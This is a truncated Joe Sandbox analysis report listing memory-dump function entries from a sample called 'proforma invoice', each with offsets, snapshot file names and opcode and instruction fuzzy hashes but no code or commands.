Source File: 00000009.00000002.2579153293.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15b0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7629e72c850cf13280b71fbb987ded75e935a98dd5f6e98b7d812d490bde48fd
Instruction ID: acb03888102b029e4ef97b5501af6c73d9a5a0eae002ae2397377055e190c444
Opcode Fuzzy Hash: 7629e72c850cf13280b71fbb987ded75e935a98dd5f6e98b7d812d490bde48fd
Instruction Fuzzy Hash: 69514770A106159FDB15DFA9D8D4A9DBBF2BF89314B1484A9E41ADF361DB30EC41CB40

Function 05E397A8 Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2590240063.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5e30000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48c3929849d0d9bc646469554e833cc5c76b0212a2f5a6ff37da6badea1ac6d4
Instruction ID: 168fda60d6ea35ce660689c91bf17f136a53c42a5540953f93e44ce49583ef6c
Opcode Fuzzy Hash: 48c3929849d0d9bc646469554e833cc5c76b0212a2f5a6ff37da6badea1ac6d4
Instruction Fuzzy Hash: ED5124B0D002188FEB18CFAAD88ABEDBBF1BF48314F549129D855AB351D7B49844CF91

Function 05E397C4 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2590240063.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5e30000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0e16e47b59611f0072b32b8991100ca813aba1903490ade4903839c33ffc0fd
Instruction ID: 7a88e5559f88dc20e84cfe09ac4a07b9c77ebfee17b006ea96037ec6eb6382fc
Opcode Fuzzy Hash: e0e16e47b59611f0072b32b8991100ca813aba1903490ade4903839c33ffc0fd
Instruction Fuzzy Hash: FE5104B0D002188FEB14CFAAD88ABEDBBF1BF48314F549119D855AB351D7B49844CF90

Function 05E39D1C Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2590240063.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5e30000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2afd0d1261e4be16988054c2867f41b4fedbf36b6fefe5d1d54ba6faec25d4a0
Instruction ID: 5d68f5ce4b49d0fb76c8160bd49df5216b998034bf339ed6209d0100777a0f66
Opcode Fuzzy Hash: 2afd0d1261e4be16988054c2867f41b4fedbf36b6fefe5d1d54ba6faec25d4a0
Instruction Fuzzy Hash: 945125B0D002188FEB14CFAAD88ABDDBBF1BF48314F14811AD855AB351D7B4A844CF50

Function 015BE910 Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2579153293.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15b0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe673142f12e9f12e1561d4abc31943cbba6aafad66112eed2c2694293bd9793
Instruction ID: dd1c608481bfc7750f3b225066d2a63f4360f43c79d68e19972b238c74f16fbe
Opcode Fuzzy Hash: fe673142f12e9f12e1561d4abc31943cbba6aafad66112eed2c2694293bd9793
Instruction Fuzzy Hash: 62417931A002068FDB65DB68D4996EEB7F6FBC8220F18C469D40A9B351CF71EC45CB91

Function 07237DA1 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2592252437.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7230000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8af44379c639788186f7cf7f8936f7a71d266d3a5a43fd27672c28c1b4d09902
Instruction ID: a489da267a9513daa295f297b38e0cd52bcb93b9d93b0118a755abaa70240390
Opcode Fuzzy Hash: 8af44379c639788186f7cf7f8936f7a71d266d3a5a43fd27672c28c1b4d09902
Instruction Fuzzy Hash: 06418070B102099FDB559FA5C854BAEBBF6FFC8700F208529E10AAB394DE759C05CB94

Function 015B54B8 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2579153293.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15b0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d92eea3f717acf64f7ef99adf9c08e1dce1d1ce5f6dc425d6876daab92afe79d
Instruction ID: 08984d48f1e064daa02dbad08bff86737a1db30dd2b55ff9229e8fd86b973f57
Opcode Fuzzy Hash: d92eea3f717acf64f7ef99adf9c08e1dce1d1ce5f6dc425d6876daab92afe79d
Instruction Fuzzy Hash: 0B41BF316047058FC729CF68D9C4AEFBBF6FF89310F18856AD599CB261E734A8418B91

Function 07238668 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2592252437.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7230000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b14eff3e1de84a803b7f769d50b32d7d6f7eb39432b4c85bb84ef9752f80b149
Instruction ID: cd0ebef41cfdd527d9cc6eb7fa9c6b698a6a9ddfae9c616913ddf99e351cee38
Opcode Fuzzy Hash: b14eff3e1de84a803b7f769d50b32d7d6f7eb39432b4c85bb84ef9752f80b149
Instruction Fuzzy Hash: DB4165B5A106068FDF30CE99C8C06AFF7F6FB84311F10492AE215D7650D770E9958BA1

Function 015B6738 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2579153293.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15b0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8c55243640f66ded6c86c3d10dfcd2ca5e03b4814e68a81168c28c1eb1aaa5c
Instruction ID: 682d94a7ec1d608e27900190c59183e58d6c300c55ae984820be4234cf308190
Opcode Fuzzy Hash: b8c55243640f66ded6c86c3d10dfcd2ca5e03b4814e68a81168c28c1eb1aaa5c
Instruction Fuzzy Hash: D841FBB5A0061ACFCB11DFA8C8809EFB7F9FF8C210B14466AD519D7255DB31E905CB91

Function 015BA799 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2579153293.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15b0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 347a37a85c4e7df8289516b98cdc4eee3124b925c519aa7ea159476273b5c9cc
Instruction ID: c88e9466b61f62db9cfd48d8a10b91f195e5678e0136375b8e3c9401c916d37c
Opcode Fuzzy Hash: 347a37a85c4e7df8289516b98cdc4eee3124b925c519aa7ea159476273b5c9cc
Instruction Fuzzy Hash: 8351F871305285CFCB19DF2DF9989493B71FB9134272092A9C0014B365DB786E9ECFA6

Function 015BE901 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2579153293.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15b0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35520d05e152fc3871f1eea2dee56b13d99949a263b71af719c04b2656983a01
Instruction ID: 0b83fb68cdadcb3f78ec06dd68e082408838247e3a78424095bdc6eefe0bee44
Opcode Fuzzy Hash: 35520d05e152fc3871f1eea2dee56b13d99949a263b71af719c04b2656983a01
Instruction Fuzzy Hash: CD417C31A002068FC7659B68C5A96EAB7F6FBC5220B1CC569D4069B352CF71EC45CB51

Function 015BA7A8 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2579153293.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15b0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39789060cd61165ae4f3a82e69daee71affb2985cd731c440c7f06bf6332fd86
Instruction ID: 062cf279cbc72be33c8accff3d82b215f9a6ba95dc523661cf9d241852f0111a
Opcode Fuzzy Hash: 39789060cd61165ae4f3a82e69daee71affb2985cd731c440c7f06bf6332fd86
Instruction Fuzzy Hash: 1251F870305286CFCB09DF2DF8989493B71FB953423205299C0014B265DB786E9ECFA6

Function 015B9019 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2579153293.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15b0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb5e9e450cd5f2b5a8871c6564567e7a41030a92b5a24776cd314695b4905e30
Instruction ID: f7c9828266bf16de5e21958f7c36b77ec60de320dbf4c557b4e0890065341449
Opcode Fuzzy Hash: bb5e9e450cd5f2b5a8871c6564567e7a41030a92b5a24776cd314695b4905e30
Instruction Fuzzy Hash: E5510570600615CFCB26CF28C9C47E977F6FB86305F1889A5DD1A9F26AD735A881CB20

Function 015BED98 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2579153293.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15b0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bdacc149f5df1c2ea5a656c9ba110ecd9b1a71903da02f1af6d0266e690015dd
Instruction ID: e89551b885b85fb04501b335131f1ce5776eb7dc2f2ea1761dfaa7f10196c454
Opcode Fuzzy Hash: bdacc149f5df1c2ea5a656c9ba110ecd9b1a71903da02f1af6d0266e690015dd
Instruction Fuzzy Hash: 86413D70A00706DFDB25DF69D4819EEBBF1FF88310B188A29D41AAB750DB30E845CB91

Function 0723582A Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2592252437.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7230000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6440d53043c44ef32c65e8be7fbb803c7f66899125186466b8abb9dd35cce3a2
Instruction ID: 352a9582ad036fff39d54f2115d226ad147e056836a7ef2c35c3b45b2e5c0042
Opcode Fuzzy Hash: 6440d53043c44ef32c65e8be7fbb803c7f66899125186466b8abb9dd35cce3a2
Instruction Fuzzy Hash: BA31EFB0B102078FDB19AB75D55466E7BE3AB89250F244869D40ADF390DE36CD46CBC1

Function 07235838 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2592252437.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7230000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: adaa455a88801565e4efe641179bc5ba9c3badb782f40f10169a47c385593a96
Instruction ID: e3e4c36fc8ae4f2ffed413c193c1a3aa23648e926ac7f89c4cd4d04bb8e0bb1d
Opcode Fuzzy Hash: adaa455a88801565e4efe641179bc5ba9c3badb782f40f10169a47c385593a96
Instruction Fuzzy Hash: E73101B0B102078FDB19AB35D51466E7BE3AB89350F208869D40ADF394DE36CD45CBD1

Function 05E365B0 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2590240063.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5e30000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 232cd697c2d36c3328999cfdfe09b2391c1f307da0d9c0f18e23330c0880a9d6
Instruction ID: a085ee3733704e99c63da2807d9699f57d7cffbd15a28adb55d05363131ef5f0
Opcode Fuzzy Hash: 232cd697c2d36c3328999cfdfe09b2391c1f307da0d9c0f18e23330c0880a9d6
Instruction Fuzzy Hash: D3315B70700706ABD755EF79D8946AAB7E2BBD4208B44C93DC04E8F255EF70E9058B91

Function 015BBF40 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2579153293.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15b0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8dad028da0ff73f01fed31be9b621e374ed279901127e402126d7d6b1dcf927
Instruction ID: a438e1572fb88781409979e12d5a8c5d68c10f55041779837e5db42b47f88061
Opcode Fuzzy Hash: a8dad028da0ff73f01fed31be9b621e374ed279901127e402126d7d6b1dcf927
Instruction Fuzzy Hash: A631E134B002198FEB14DB78D4987AE7BF2FB89601F148469D905AB390DFB19C40DBA1

Function 05E36090 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2590240063.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5e30000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a6da6ce700aef09cefe87335a4327de86905254e3e92122b824fd2c5a804ac9
Instruction ID: 29c24340c8ad08057e02382458e02b1bcd3a2fc38c884bd88c928a2e84301c66
Opcode Fuzzy Hash: 4a6da6ce700aef09cefe87335a4327de86905254e3e92122b824fd2c5a804ac9
Instruction Fuzzy Hash: 0E419331600205DFCB16CF68D9C1AAABBF1FF49315B1484AEE5499B362D736E842CF50

Function 05E3ADB0 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2590240063.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5e30000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f18ed4923085fc2804e3d1c6346059eb2947734a2c1329f2c8405a5991b3cf32
Instruction ID: 76ad59ee92763f0608aec7b4d72bf942129853c030f6ecc19480b488710aae97
Opcode Fuzzy Hash: f18ed4923085fc2804e3d1c6346059eb2947734a2c1329f2c8405a5991b3cf32
Instruction Fuzzy Hash: 32318170E00215CFEF14CF65C499BAEB7B2FF85304F54852AE481EB240DB719985CB51

Function 05E3ADD0 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2590240063.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5e30000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9d3830392dca903c51a229f6bcdfcd6ce1721c387958bd5ecba9d2d7ef90169
Instruction ID: 5a79af421f65807ef9637d952c42844b7e6cd62246b496363a24cdc86999c96d
Opcode Fuzzy Hash: a9d3830392dca903c51a229f6bcdfcd6ce1721c387958bd5ecba9d2d7ef90169
Instruction Fuzzy Hash: DB319070E0020ADBEF14CF65D449BAEB7B2FF85304F50852AE882EB240EB7199C5CB50

Function 015B3E08 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2579153293.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15b0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14296556b77756f86dfbf63b08c2b5b9b03c1fc567eb1d2c03fc7bd200ea7ef6
Instruction ID: d0168efb5a8421f1aac5a3f2f96d1168c8a633e6c038129cb8fb748a63ac306e
Opcode Fuzzy Hash: 14296556b77756f86dfbf63b08c2b5b9b03c1fc567eb1d2c03fc7bd200ea7ef6
Instruction Fuzzy Hash: 9D31E231604305DFD316DB68D864B9DBBE2FF85314F1980BAC5099F362DA31AD42CB91

Function 072356E9 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2592252437.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7230000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a71e70f4f08c64f013da384c3a30dac4ac9c7525c76e5d297c9e648c148cb89
Instruction ID: ef2c074072ff2c7b6716b3e7dd7e78d96539ba781905c7bad0d663a5935cfe91
Opcode Fuzzy Hash: 5a71e70f4f08c64f013da384c3a30dac4ac9c7525c76e5d297c9e648c148cb89
Instruction Fuzzy Hash: AE3130B4A10606DBCF18CF65D89569EB7B2FF89304F108529E85AEB354DB70AD42CB50

Function 072356F8 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2592252437.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7230000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33de89da06f5e7786995cec642e5de694e0ddc5344661826b7007356f3c7bd55
Instruction ID: e48405da7f824f2b942fede88acb7703dbdc611104557cd11c06b250f8644f2b
Opcode Fuzzy Hash: 33de89da06f5e7786995cec642e5de694e0ddc5344661826b7007356f3c7bd55
Instruction Fuzzy Hash: D1310DB4A14606DBCB18CFA5D85469EB7B2BF89300F108529E81AEB354EB70AD52CB50

Function 05E36708 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2590240063.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5e30000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41fab0f14cbea4ec39e3e5b3e2de50bcde30c2df2e50527ffe9457c085dae3b8
Instruction ID: 031c6f3c270b46b7fb179b53090c3b2367898b1d52c076256ed5eee753bbf6bf
Opcode Fuzzy Hash: 41fab0f14cbea4ec39e3e5b3e2de50bcde30c2df2e50527ffe9457c085dae3b8
Instruction Fuzzy Hash: 5931C272A00218AFDB15CB64C849ADCBFF2FF88314F5890A9D445BB261DB71EC45CB61

Function 015BCB00 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2579153293.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15b0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1caf9c43bc0295e765d635966ff0a8563e125e788871bc867d1cb48cb9d673b5
Instruction ID: 93641dbb7e56cb13fbec0c2a79be9f08adb75c682f2e0a0e69617aaad31603ea
Opcode Fuzzy Hash: 1caf9c43bc0295e765d635966ff0a8563e125e788871bc867d1cb48cb9d673b5
Instruction Fuzzy Hash: 1C21C135B005078BCB16CA6CD894AFFBBF6FBC8210F54842AD505DB384DF7099469790

Function 05E3FEB9 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2590240063.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5e30000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9545ad97f4d0c3aee3fe11d79e539a06ea0bcbccd05c290c2e064f2f5d6e2864
Instruction ID: 0876dbc26ca90a86ca714b3eba36689c773c41c70f40d63797aa086096d508ab
Opcode Fuzzy Hash: 9545ad97f4d0c3aee3fe11d79e539a06ea0bcbccd05c290c2e064f2f5d6e2864
Instruction Fuzzy Hash: A631A131A046668FCB10CF48C985DAAF7F6FF85310B1AC655E8669B295D334FD44CB90

Function 05E37860 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2590240063.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5e30000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80d488c2e298eb77b9cbc8c97c199719d96d15cd38dd1f6d6dcdd93a00d22571
Instruction ID: 1fdf9b4cb8f04e21d93384506c0db752c27091de50750c1ddcba2725404a0b31
Opcode Fuzzy Hash: 80d488c2e298eb77b9cbc8c97c199719d96d15cd38dd1f6d6dcdd93a00d22571
Instruction Fuzzy Hash: 0C21DB313146208FC705DB38D458A19BBE6EF89615B2980FEE10ACF3A1CE72DC02CB91

Function 05E3D0A0 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2590240063.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5e30000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a475029349bc1763bfea094ede44ebbb0892961315e410b725a53bc594608dd2
Instruction ID: f7ef96e1a84570a35883b632524f200461fad4c5b25b8febf2212c0f13d7fc30
Opcode Fuzzy Hash: a475029349bc1763bfea094ede44ebbb0892961315e410b725a53bc594608dd2
Instruction Fuzzy Hash: 5F318F75E002069BEB05CFA8D995AAEF7B2FF89304F50C51AE845EB350DB71D846CB90

Function 015BCD0E Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2579153293.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15b0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f0814129d4364dff1dfe1499f2970b926d3c7fdc68f2d640693b736f6073a0d
Instruction ID: f98adc3dc74df5c1e99384cae94f8563a3f57eafa56a76910ad284328f471a7d
Opcode Fuzzy Hash: 4f0814129d4364dff1dfe1499f2970b926d3c7fdc68f2d640693b736f6073a0d
Instruction Fuzzy Hash: D731E2B1D0024DDFDB10CFAAD491ADEBFF5BB48310F24802AE819AB250D775A945CF94

Function 072370E8 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2592252437.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7230000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b5a59bbce4b9b179a83a62aedd5e0df9861349c3b37695aeb83a08a341e5b0c
Instruction ID: 2dc29973ac9ffa23b130e9c1602b9c8d8d1cc3f6fbdfdc9f08b7c5dada98435d
Opcode Fuzzy Hash: 6b5a59bbce4b9b179a83a62aedd5e0df9861349c3b37695aeb83a08a341e5b0c
Instruction Fuzzy Hash: 94216BB6B112169FDF10CF6CE980AAEBBF1EB48750F158029E940E7350DB75DD018B94

Function 05E3D0B0 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2590240063.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5e30000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20978d8ac45753317f060f1364e9fdf7fee8cc9d719a600fb6d6c46a99018556
Instruction ID: a8f585fca9a6e2eb64f98aec61e1f3d826cdaf86ee4d3daa291bf12fed8d870b
Opcode Fuzzy Hash: 20978d8ac45753317f060f1364e9fdf7fee8cc9d719a600fb6d6c46a99018556
Instruction Fuzzy Hash: EC217E30E0020A9BDB05CFA8D995AAEF7B2FF85344F10D61AE845AB350DB71D846CB90

Function 072370F8 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2592252437.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7230000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 829f190702b43a7f1501a5fa5fec88eacd7d670dfb92c12dc83a1a7e4400de51
Instruction ID: 626f432d19907b6f0910978c10a16fa66c475f44b29bc131c98e0ffac782096b
Opcode Fuzzy Hash: 829f190702b43a7f1501a5fa5fec88eacd7d670dfb92c12dc83a1a7e4400de51
Instruction Fuzzy Hash: 4C216BB6B102169FDF10CF69E980AAEBBF1EB48610F104025E941E7350E675DD01CBA4

Function 015BCD18 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2579153293.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15b0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ececc77828cd7cd4fe81650465c10eb7537fd269740538d27aa19d4a1447465
Instruction ID: dbd9691ea14e76ea88f61191f6882cdb02ee8df08d4d0f52cc00faa43f56ae84
Opcode Fuzzy Hash: 5ececc77828cd7cd4fe81650465c10eb7537fd269740538d27aa19d4a1447465
Instruction Fuzzy Hash: A131CEB1D00249DFDB10CFAAD884ADEBFF9BB48310F14802AE819AB250D775A945CB90

Function 0155D4D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2578759809.000000000155D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0155D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_155d000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d62f6ce8453713316f14da1acd7d9436c5418c6403d46ada153e60705ca9f196
Instruction ID: 72e3f23fa8a97dfefc18955c9a3e6b05539194410216d2819fa2616bc6f308f1
Opcode Fuzzy Hash: d62f6ce8453713316f14da1acd7d9436c5418c6403d46ada153e60705ca9f196
Instruction Fuzzy Hash: D52103B2500244DFDB45DF94D9C0B2ABFB5FB8831CF20856ADD050F256C336D856CAA2

Function 05E382BE Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2590240063.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5e30000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fb804bf5706a908a9151a8ff87ff131a750b3c24fd6d043b8632e810fec9604
Instruction ID: c9b3c59a6b169cdfede5139a20c2762e5285d67a85db9ae7c51a780f79caf42b
Opcode Fuzzy Hash: 2fb804bf5706a908a9151a8ff87ff131a750b3c24fd6d043b8632e810fec9604
Instruction Fuzzy Hash: 28218934705204CFDB11EB78D95DAAD7BF2FF89204B1000A8E446EB3A4DB359C04CB61

Function 015BC69E Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2579153293.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15b0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1bb984bf4d6b099a4dda617607df1a257b224563637f603b56a218cb0d0061b0
Instruction ID: ec9c4ce74342bfa501f302e616cf4b9807e551be4d60434f18cb2187db4a4abf
Opcode Fuzzy Hash: 1bb984bf4d6b099a4dda617607df1a257b224563637f603b56a218cb0d0061b0
Instruction Fuzzy Hash: 7531E1B5C00249DFDB24CFAAD590BDEBFF4BF08210F24812AE519AB254D774A845CB94

Function 015BAF98 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2579153293.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15b0000_proforma invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
